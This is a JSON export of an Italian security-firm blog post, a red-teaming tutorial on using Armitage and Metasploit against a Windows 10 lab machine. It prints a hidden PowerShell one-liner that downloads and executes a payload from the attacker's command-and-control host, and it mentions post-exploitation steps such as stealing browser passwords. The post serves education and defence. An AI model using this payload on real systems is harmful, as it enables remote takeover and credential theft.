{"id":1055,"date":"2020-01-16T18:39:50","date_gmt":"2020-01-16T16:39:50","guid":{"rendered":"https:\/\/fortgale.com\/news\/?p=1055"},"modified":"2020-01-16T18:39:50","modified_gmt":"2020-01-16T16:39:50","slug":"red-teaming-series-armitage","status":"publish","type":"post","link":"https:\/\/fortgale.com\/blog\/cyber-security-news\/red-teaming-series-armitage\/","title":{"rendered":"RED TEAMING SERIES -ARMITAGE"},"content":{"rendered":"<p style=\"text-align: justify\">Durante un attivit\u00e0 di <strong>Red Teaming<\/strong> o <strong>Penetration Testing<\/strong>, gli hacker etici (meglio definirli come Penetration Tester) effettuano attivit\u00e0 di incursione informatica nei sistemi di una azienda, previa autorizzazione.<\/p>\n<p style=\"text-align: justify\">Come un Penetration Tester pu\u00f2 ottenere il controllo di un sistema, sia esso un server, una workstation, uno smartphone o un dispositivo connesso? Deve trovare il modo di eseguire comandi o codice nel sistema target.<\/p>\n<p style=\"text-align: justify\">Uno degli strumenti pi\u00f9 utilizzati nel settore \u00e8 sicuramente <strong>Metasploit<\/strong> (ma esistono diverse alternative).<\/p>\n<p><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/msf.png\" alt=\"\" width=\"933\" height=\"733\" class=\"alignnone size-full wp-image-1060\" loading=\"lazy\"><\/p>\n<p><\/p>\n<p style=\"text-align: justify\"><strong>Armitage<\/strong> \u00e8 un interfaccia grafica che sfrutta le potenzialit\u00e0 di <strong>Metasploit<\/strong>. La funzionalit\u00e0 di <em>collaboration<\/em>, per mezzo del comando <em>teamserver,<\/em> \u00e8 particolarmente utile durante le attivit\u00e0 in team.<\/p>\n<p style=\"text-align: justify\">Le funzionalit\u00e0 di Armitage permettono di:<\/p>\n<ul>\n<li>condividere la stessa sessione metasploit<\/li>\n<li>condividere hosts, dati e file scaricati dai sistemi target<\/li>\n<li>comunicare con il team<\/li>\n<li>creare script per attivit\u00e0 di <em>automation<\/em><\/li>\n<\/ul>\n<p><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/maxresdefault.jpg\" alt=\"\" width=\"1280\" height=\"720\" class=\"alignnone size-full wp-image-1063\" loading=\"lazy\"><\/p>\n\n\n\n\n<h2 class=\"wp-block-heading\">Scenario d&#8217;attacco<\/h2>\n\n\n<p style=\"text-align: justify\">In questo esempio la postazione dell&#8217;attaccante (Kali Linux) si trova all&#8217;interno della stessa rete del target (Windows 10).<\/p>\n<table style=\"height: 75px\">\n<tbody>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Subnet:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.0\/24<\/em><\/td>\n<\/tr>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Kali Linux:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.15<\/em><\/td>\n<\/tr>\n<tr style=\"height: 25px\">\n<td style=\"width: 235.556px;height: 25px\"><strong>Windows 10:<\/strong><\/td>\n<td style=\"width: 328.889px;height: 25px\"><em>10.0.2.4<\/em><\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p style=\"text-align: justify\">Ipotizzando di poter accedere fisicamente alla postazione Windows e poter lanciare dei comandi, abbiamo deciso di utilizzare Powershell per eseguire dei comandi che ci permetteranno di controllare la postazione (Web Delivery).<\/p>\n\n\n<h2 class=\"wp-block-heading\">Configurazione attaccante (Kali Linux)<\/h2>\n\n\n\n<p style=\"text-align: justify\">Per quanto riguarda il sistema Kali Linux, \u00e8 necessario procedere con l&#8217;installazione di Armitage:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">root@kali:~# apt update\nroot@kali:~# apt install armitage\nroot@kali:~# msfdb init\nroot@kali:~# service postgresql start\nroot@kali:~# armitage<\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/1.png?fit=750%2C380&amp;ssl=1\" alt=\"\" class=\"wp-image-1057\" loading=\"lazy\" \/><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Configurazione target (Windows 10)<\/h2>\n\n\n\n<p style=\"text-align: justify\">Per quanto riguarda la configurazione del sistema target (Windows 10) abbiamo disattivato l&#8217;AntiVirus Windows Defender. Questo perch\u00e8 il codice Powershell verrebbe immediatamente identificato come malevolo.<\/p>\n<p>E&#8217; ovviamente possibile generare del codice che superi i sistemi di protezione come quello di un AntiVirus. Tratteremo questo argomento in un prossimo articolo.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">Command&amp;Control &#8211; Kali<\/h2>\n\n\n<p style=\"text-align: justify\">Il server di comando e controllo (denominato anche anche C2, C&amp;C) in questo caso coincide con la macchina dell&#8217;attaccante ed \u00e8 il sistema utilizzato per controllare i sistemi compromessi.<\/p>\n<p style=\"text-align: justify\">Per il controllo della postazione utilizziamo il modulo <strong>Web Delivery<\/strong>:<\/p>\n<ul style=\"text-align: justify\">\n<li><strong>exploit &gt; multi &gt; script &gt; web delivery<\/strong><\/li>\n<\/ul>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped wp-block-gallery-1 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/11-1.png?fit=750%2C409&amp;ssl=1\" alt=\"\" data-id=\"1073\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/11-1.png?fit=1575%2C858&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1073\" class=\"wp-image-1073\" loading=\"lazy\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/12.png\" alt=\"\" data-id=\"1074\" data-full-url=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/12.png?fit=878%2C531&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1074\" class=\"wp-image-1074\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n\n<p><br>Comando Powershell:<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">powershell.exe -nop -w hidden -c $s=new-object net.webclient;$s.proxy=[Net.WebRequest]::GetSystemWebProxy();$s.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $s.downloadstring('http:\/\/10.0.2.15:8080\/uyyPYd62NNpvHHU'); <\/pre>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i2.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/13.png?fit=750%2C567&amp;ssl=1\" alt=\"\" class=\"wp-image-1075\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p><br>Risultato dell&#8217;avvenuta compromissione:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/14.png\" alt=\"\" class=\"wp-image-1076\" loading=\"lazy\" \/><\/figure>\n\n\n\n<p>In questa posizione sia un criminale che un penetration tester pu\u00f2 tipicamente muoversi effettuando:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/smart-1.png?fit=750%2C503&amp;ssl=1\" alt=\"\" class=\"wp-image-1098\" loading=\"lazy\" \/><\/figure>\n\n\n<p style=\"text-align: justify\">Questa fase dell&#8217;attacco corrisponde allo stadio numero 6 &#8220;<strong>Command &amp; Control<\/strong>&#8221; descritto nel <em>Cyber Kill Chain<\/em>:<\/p>\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/cyberkillchain.jpg\" alt=\"\" class=\"wp-image-1079\" loading=\"lazy\" \/><\/figure>\n\n\n<p style=\"text-align: justify\">E&#8217; possibile interagire con il sistema e passare alla fase 7 del <em>Cyber Kill Chain<\/em> &#8220;Actions on objectives&#8221; <strong>enumerando<\/strong> il sistema, il dominio, ottenendo le password dei browser, effettuando attivit\u00e0 di persistenza o lateral movement, e cos\u00ec via :<\/p>\n\n\n<figure class=\"wp-block-gallery columns-1 is-cropped wp-block-gallery-2 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/15-1.png?fit=750%2C601&amp;ssl=1\" alt=\"\" data-id=\"1084\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/15-1.png?fit=1167%2C935&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1084\" class=\"wp-image-1084\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n<p>L&#8217;<strong>enumerazione del sistema<\/strong> \u00e8 uno step fondamentale per capire il contesto e ottenere maggiori informazioni che riguardano il sistema compromesso:<\/p>\n\n\n<figure class=\"wp-block-gallery columns-2 is-cropped wp-block-gallery-3 is-layout-flex wp-block-gallery-is-layout-flex\"><ul class=\"blocks-gallery-grid\"><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/5.png?fit=750%2C352&amp;ssl=1\" alt=\"\" data-id=\"1081\" data-full-url=\"https:\/\/i1.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/5.png?fit=1302%2C612&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1081\" class=\"wp-image-1081\" loading=\"lazy\" \/><\/figure><\/li><li class=\"blocks-gallery-item\"><figure><img decoding=\"async\" src=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/6.png?fit=750%2C366&amp;ssl=1\" alt=\"\" data-id=\"1082\" data-full-url=\"https:\/\/i0.wp.com\/fortgale.com\/news\/wp-content\/uploads\/sites\/2\/2020\/01\/6.png?fit=1916%2C935&amp;ssl=1\" data-link=\"https:\/\/fortgale.com\/news\/?attachment_id=1082\" class=\"wp-image-1082\" loading=\"lazy\" \/><\/figure><\/li><\/ul><\/figure>\n\n\n\n<h2 class=\"wp-block-heading\">Conclusioni<\/h2>\n\n\n<p style=\"text-align: justify\">Gli strumenti e le operazioni fin qui descritte sono tipiche attivit\u00e0 di <strong>Red Teaming<\/strong> e coincidono con le attivit\u00e0 svolte dai <strong>Cyber-criminali<\/strong>. In quest&#8217;ultimo caso ovviamente sono presenti ulteriori layer di complessit\u00e0 dettate dall&#8217;ambiente attaccato, dai sistemi di protezione che \u00e8 necessario aggirare, da filtri e limitazioni di ogni genere.<\/p>\n<p style=\"text-align: justify\"><strong>Difendersi da questi attacchi \u00e8 possibile adottando una serie di soluzioni tecnologiche e di attivit\u00e0 specialistiche<\/strong>. La difesa di un infrastruttura non pu\u00f2 prescindere infatti da attivit\u00e0 di:<\/p>\n<ul>\n<li><strong>Protezione&nbsp;<\/strong>\n<ul>\n<li><span>AntiVirus, Firewall, AntiSpam, Sandbox, WAF e IPS sono indispensabili ma possono essere facilmente elusi<\/span><\/li>\n<\/ul>\n<\/li>\n<li><strong>Rilevamento<\/strong>\n<ul>\n<li>Tecnologie ed attivit\u00e0 di monitoraggio e Threat Hunting svolte da analisti<\/li>\n<\/ul>\n<\/li>\n<li><strong>Risposta<\/strong>\n<ul>\n<li>Attivit\u00e0 di Incident Response<\/li>\n<\/ul>\n<\/li>\n<\/ul>","protected":false},"excerpt":{"rendered":"<p>Red teaming con armitage per la gestione di un cyber attacco<\/p>\n","protected":false},"author":1,"featured_media":1079,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[34,115,225,276,290,293,299],"class_list":["post-1055","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cyber-security-news","tag-armitage","tag-detection","tag-metasploit","tag-protezione","tag-red-teaming","tag-response","tag-risposta"],"_links":{"self":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1055","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/comments?post=1055"}],"version-history":[{"count":0,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/posts\/1055\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/media?parent=1055"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/categories?post=1055"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/fortgale.com\/blog\/wp-json\/wp\/v2\/tags?post=1055"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}